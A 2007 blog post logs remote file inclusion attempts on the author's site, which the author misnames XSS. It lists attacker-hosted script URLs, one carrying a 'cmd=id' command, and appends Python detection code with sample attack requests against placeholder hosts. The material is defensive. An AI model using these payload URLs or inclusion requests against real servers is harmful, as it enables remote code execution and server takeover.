Annoying XSS attempts

2007-10-16

A couple of examples of pathetic attempts to hack my site. The attempts virtually always consist of loading a page in the form of http://qfox.nl/index.php?a=http://newpage?, hoping the page will be fetched remotely and parsed by my server, giving the script kiddy access to my server. The fact that all those URLs end with a question mark is remarkable, as if it's a specific exploit. For most of them, their first attempt is also their first hit on my website. This means they either visited my site from another IP before trying to XSS it, or my site is listed somewhere and they simply try.

Often these scripts are removed very soon after the attempt, but sometimes they exist longer. Enjoy while you can (at your own risk!):

http://diemuellers.org/n? (Simple script, tries to execute commands on your server remotely.) You can read more about this botnet here.

http://amyru.h18.ru/images/cs.txt? (Extended script allowing the script kiddy to control your server; if I read the script right, your server becomes a drone in a botnet.)

http://www.csmksa.org/bbs/data/Sports/2003_group4.JPG?&cmd=id (Image injection exploit, quick and dirty.)

http://n2.myftp.org/cmd.txt? (This one got caught by its host :D)

http://www.geocities.com/sina_amoo//cedarsresort.txt? (An extended script trying to abuse the mail server of your server; includes an email address.)

Oh, and this one, not half an hour after posting this blog:

http://www.redcluster.net/modules/forums/admin/st0rm.gif? (Script tries to abuse the mail server, includes a hotmail address! boot.unknown@hotmail.com)

I'm gonna put up a list of encountered XSS attempts soon. And anyone caught trying to XSS my site will be banned, no excuses. Consider yourself warned.
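Detection logic for the index.php?a=http://...? pattern the post describes, added here as an example and not part of the original post. It parses Apache combined-format access log lines (an assumed format; the log lines are constructed samples with placeholder hosts), flags any query parameter whose value is an absolute URL, and records whether the value ends in the trailing question mark the author noticed and whether the request was that client's first visit.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" log format (assumed); only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# A parameter value that is itself an absolute URL is the remote-inclusion tell.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines; hosts and IPs are placeholders, not real indicators.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2007:10:01:02 +0200] "GET /index.php?a=http://evil.example/n? HTTP/1.1" 200 512
203.0.113.8 - - [16/Oct/2007:10:03:15 +0200] "GET /index.php?a=home HTTP/1.1" 200 5120
198.51.100.4 - - [16/Oct/2007:10:05:44 +0200] "GET /index.php?a=http%3A%2F%2Fevil.example%2Fcs.txt%3F HTTP/1.1" 200 512
198.51.100.9 - - [16/Oct/2007:10:06:10 +0200] "GET /about.html HTTP/1.1" 200 2048
198.51.100.9 - - [16/Oct/2007:10:07:01 +0200] "GET /index.php?a=http://img.example/x.JPG?&cmd=id HTTP/1.1" 200 512
192.0.2.1 - - [16/Oct/2007:10:09:30 +0200] "GET /about.html HTTP/1.1" 200 2048
"""


def find_remote_includes(log_text):
    """Return one dict per suspicious request: client IP, parameter name,
    the remote URL it carried, whether that URL ends in '?', and whether
    this line was the first request seen from that IP."""
    hits = []
    seen = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip = m.group('ip')
        first_visit = ip not in seen
        seen.add(ip)
        # Everything after the first '?' is the query string; parse_qsl
        # percent-decodes values, so encoded "http%3A%2F%2F" is caught too.
        query = m.group('path').partition('?')[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({
                    'ip': ip,
                    'param': name,
                    'url': value,
                    'trailing_qmark': value.endswith('?'),
                    'first_visit': first_visit,
                })
    return hits
```

Feeding a real access log through find_remote_includes gives the per-IP list the post talks about banning from, without relying on the remote script still being online.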